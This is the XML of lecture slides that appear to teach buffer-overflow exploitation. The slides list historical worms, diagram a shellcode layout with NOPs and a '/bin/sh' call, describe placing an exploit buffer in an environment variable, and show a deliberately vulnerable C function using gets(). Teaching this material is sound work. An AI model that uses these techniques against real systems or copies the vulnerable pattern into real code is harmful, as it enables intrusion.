              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6AAB106-C84C-CF42-B32D-2B55D887B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709" y="571633"/>
            <a:ext cx="3597840" cy="202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00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6" grpId="0" animBg="1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3B73A5-26EA-8942-9D20-C7690494D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324" y="2057401"/>
            <a:ext cx="4025777" cy="37397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Buffers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6781800" y="1920478"/>
            <a:ext cx="2628900" cy="1165622"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70233"/>
              <a:gd name="adj2" fmla="val 788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What if 400 is changed to a small value, say 10?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009900" y="4343400"/>
            <a:ext cx="6400800" cy="1257300"/>
          </a:xfrm>
          <a:prstGeom prst="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Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4867275" y="4686300"/>
            <a:ext cx="628650" cy="62865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more code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524750" y="4681538"/>
            <a:ext cx="514350" cy="62865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ptr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4410075" y="4681538"/>
            <a:ext cx="457200" cy="62865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jmp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5495925" y="4681538"/>
            <a:ext cx="514350" cy="628650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call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>popl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6010275" y="4681538"/>
            <a:ext cx="628650" cy="628650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“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>”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638926" y="4678034"/>
            <a:ext cx="885825" cy="628650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empty</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Elbow Connector 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="22" idx="0"/>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="5779469" y="2683844"/>
            <a:ext cx="4763" cy="4000153"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3600000"/>
            </a:avLst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3" idx="2"/>
            <a:endCxn id="24" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5195889" y="4752976"/>
            <a:ext cx="9525" cy="1114425"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1800000"/>
            </a:avLst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638926" y="4681538"/>
            <a:ext cx="885825" cy="628650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address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Elbow Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="24" idx="0"/>
            <a:endCxn id="21" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="5464970" y="4398169"/>
            <a:ext cx="4763" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2365370"/>
            </a:avLst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124201" y="4686300"/>
            <a:ext cx="1315145" cy="62865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NOPs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039100" y="4676774"/>
            <a:ext cx="514350" cy="62865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ptr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8553450" y="4676774"/>
            <a:ext cx="514350" cy="62865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ptr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55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1" grpId="0" animBg="1"/>
      <p:bldP spid="32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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{647D3BEC-4C2A-3E4E-A4EE-9A4B7DDF40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Famous Internet Worms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4100" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B0CDE2F-4B3C-024F-945C-89A802C2D4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8515350" cy="4354830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Morris worm (1988): overflow in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>fingerd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>6,000 machines infected (10% of existing Internet)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>CodeRed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> (2001): overflow in MS-IIS server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>300,000 machines infected in 14 hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Slammer (2003): overflow in MS-SQL server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>75,000 machines infected in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>10 minutes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> (!!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Sasser (2004): overflow in Windows LSASS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Around 500,000 machines infected</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13317" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB1D9614-15F2-A34F-99D7-1DF4DACF9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008" y="5351908"/>
            <a:ext cx="2738250" cy="590931"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -56482"/>
              <a:gd name="adj2" fmla="val -21263"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="lg" len="lg"/>
            <a:tailEnd type="none" w="lg" len="lg"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dirty="0"/>
              <a:t>Responsible for user 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dirty="0"/>
              <a:t>authentication in Windows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5F8B0-C511-814E-A248-B53F4ABAFE3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8358041" y="1457550"/>
            <a:ext cx="2287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Highest fraction of the Internet infected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305230-2EDF-EB44-AA18-BBB1B5E1ACEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7473300" y="1975980"/>
            <a:ext cx="624240" cy="391320"/>
            <a:chOff x="7473300" y="1975980"/>
            <a:chExt cx="62424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3250490-BE48-314E-A907-103974DA0DC4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7473300" y="1975980"/>
                <a:ext cx="624240" cy="304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3250490-BE48-314E-A907-103974DA0DC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64660" y="1966980"/>
                  <a:ext cx="6418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4F5DF86-6E92-0A49-8A6C-F288E79528AF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7483740" y="2285220"/>
                <a:ext cx="180720" cy="82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4F5DF86-6E92-0A49-8A6C-F288E79528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75100" y="2276580"/>
                  <a:ext cx="198360" cy="99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A2365FD-616A-C144-AB23-AA217A9281D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8791318" y="4761032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Fastest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E47950-223A-A945-89AD-43A5541D03A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8097540" y="4836797"/>
            <a:ext cx="507960" cy="222840"/>
            <a:chOff x="8770380" y="4356300"/>
            <a:chExt cx="50796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AD89561-6518-E341-B6C9-A13A0E224B4A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8770380" y="4356300"/>
                <a:ext cx="507960" cy="142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AD89561-6518-E341-B6C9-A13A0E224B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61740" y="4347300"/>
                  <a:ext cx="525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647890D-202D-E44B-89B5-0EAD5C8B55BB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8789820" y="4466460"/>
                <a:ext cx="112680" cy="112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647890D-202D-E44B-89B5-0EAD5C8B55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81180" y="4457820"/>
                  <a:ext cx="130320" cy="13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76245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195760" y="2121901"/>
            <a:ext cx="6094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 an environment variable to store the exploit buffer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92675" y="2504094"/>
            <a:ext cx="8599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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(“meet”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="20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Normally, bash passes in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> array from your shell’s environment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Can also pass it in explicitly via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>()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38500" y="4774488"/>
            <a:ext cx="800100" cy="6286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.text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38600" y="4774488"/>
            <a:ext cx="800100" cy="6286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.data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838700" y="4774488"/>
            <a:ext cx="857250" cy="6286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  <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bss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695950" y="4774488"/>
            <a:ext cx="2057400" cy="6286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Document 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5921276" y="4542613"/>
            <a:ext cx="635200" cy="1085850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924552" y="494593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26" name="Document 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7435751" y="4549162"/>
            <a:ext cx="635200" cy="1085850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606770" y="4945938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276849" y="4781038"/>
            <a:ext cx="800100" cy="6286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Env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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6280806" y="5631738"/>
            <a:ext cx="5304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7337162" y="5631738"/>
            <a:ext cx="5304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049638" y="5443723"/>
            <a:ext cx="12891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Low memory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>addresses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24851" y="5517438"/>
            <a:ext cx="13260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High memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Down Arrow 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8503951" y="4129094"/>
            <a:ext cx="400050" cy="5715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3310D3-1DFF-514A-92B9-523031D22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Small Buffers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B66EBD-272F-1049-93FC-0D1A3F408F3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4705350" y="30151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array of pointers to strings (just like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/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4B6209-BC04-1240-A585-308D4FC3737E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4546500" y="2973180"/>
            <a:ext cx="204120" cy="221760"/>
            <a:chOff x="4546500" y="2973180"/>
            <a:chExt cx="20412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CD1C1C7-4061-7844-9AF2-6B451E97DE2C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4546500" y="2973180"/>
                <a:ext cx="195120" cy="221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CD1C1C7-4061-7844-9AF2-6B451E97DE2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37500" y="2964180"/>
                  <a:ext cx="212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6B4648F-AAF0-754C-9892-0F99B71BC841}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4646940" y="2975340"/>
                <a:ext cx="103680" cy="28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6B4648F-AAF0-754C-9892-0F99B71BC8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38300" y="2966340"/>
                  <a:ext cx="121320" cy="4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93849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181217" y="4745912"/>
            <a:ext cx="800100" cy="6286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.text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981317" y="4745912"/>
            <a:ext cx="800100" cy="6286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.data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781417" y="4745912"/>
            <a:ext cx="857250" cy="6286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  <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bss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638667" y="4745912"/>
            <a:ext cx="2057400" cy="6286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Document 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4863993" y="4514037"/>
            <a:ext cx="635200" cy="1085850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867269" y="491736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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Document 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6378468" y="4520586"/>
            <a:ext cx="635200" cy="1085850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549487" y="4917362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219566" y="4752462"/>
            <a:ext cx="800100" cy="6286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Env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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223523" y="5603162"/>
            <a:ext cx="5304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6279879" y="5603162"/>
            <a:ext cx="5304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992355" y="5415147"/>
            <a:ext cx="12891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Low memory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>addresses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267568" y="5488862"/>
            <a:ext cx="13260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High memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>addresses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467342" y="2737185"/>
            <a:ext cx="628650" cy="62865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more code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641551" y="2739191"/>
            <a:ext cx="514350" cy="62865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ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5010142" y="2732422"/>
            <a:ext cx="457200" cy="62865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jmp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095992" y="2732422"/>
            <a:ext cx="514350" cy="628650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call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>popl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6523921" y="2732422"/>
            <a:ext cx="885825" cy="628650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“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>”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238993" y="2728918"/>
            <a:ext cx="885825" cy="628650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empty</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Elbow Connector 39"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="35" idx="0"/>
            <a:endCxn id="44" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="3639281" y="1996633"/>
            <a:ext cx="2006" cy="1483114"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8645794"/>
            </a:avLst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36" idx="2"/>
            <a:endCxn id="37" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5795956" y="2803861"/>
            <a:ext cx="9525" cy="1114425"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1800000"/>
            </a:avLst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238993" y="2732422"/>
            <a:ext cx="885825" cy="628650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address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Elbow Connector 42"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="37" idx="0"/>
            <a:endCxn id="29" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="6065037" y="2449053"/>
            <a:ext cx="4763" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2365370"/>
            </a:avLst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724268" y="2737185"/>
            <a:ext cx="1315145" cy="62865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NOPs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3781417" y="3421269"/>
            <a:ext cx="3714750" cy="1318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  <a:endCxn id="28" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7619616" y="3421269"/>
            <a:ext cx="476628" cy="13311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>
          <a:xfrm>
            <a:off x="2640120" y="3389508"/>
            <a:ext cx="3764682" cy="135640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/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3155901" y="3370598"/>
            <a:ext cx="3311569" cy="137578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69678" y="1893977"/>
            <a:ext cx="924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Overwrite saved return address with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to environment variable holding attack code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F925F5-AF58-9A4A-BA73-E7198C59A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Small Buffers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6FAE981-A575-7746-8A25-C354E7F2C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595" y="4044955"/>
            <a:ext cx="4572000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int foo (void (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>funcp</a:t>
            </a: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)()) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone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    char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a: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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1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point_to_an_array</a:t>
            </a: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;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone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    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a: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[128];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone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    gets (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1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buf</a:t>
            </a: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);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1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strncpy</a:t>
            </a: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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1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ptr</a:t>
            </a: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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1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buf</a:t>
            </a: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, 8);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone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    (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1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funcp</a:t>
            </a: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)();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Line 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE18353-96D9-F441-AFDB-AA293B6ADF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696450" y="2209800"/>
            <a:ext cx="0" cy="719138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0245" name="Text Box 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37EF6AE-FB33-5742-A01D-DB958AA44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4714" y="2281238"/>
            <a:ext cx="8270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ja-JP" sz="18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String grows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10246" name="Line 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A1C105D-6068-9841-B589-E26077C42B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696450" y="5410200"/>
            <a:ext cx="0" cy="719138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0247" name="Text Box 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC35F99-554E-1D40-922C-5CDE3189D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4714" y="5481638"/>
            <a:ext cx="8270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ja-JP" sz="18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Stack grows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10248" name="Rectangle 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE70780E-128F-EB41-A9FE-795526D30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20" y="1919293"/>
            <a:ext cx="34099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int bar (int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>val1</a:t>
            </a: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) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone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    int  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>val2</a:t>
            </a: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;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone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    foo (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1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a_function_pointer</a:t>
            </a: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);</a:t>
            </a:r>
          </a:p>
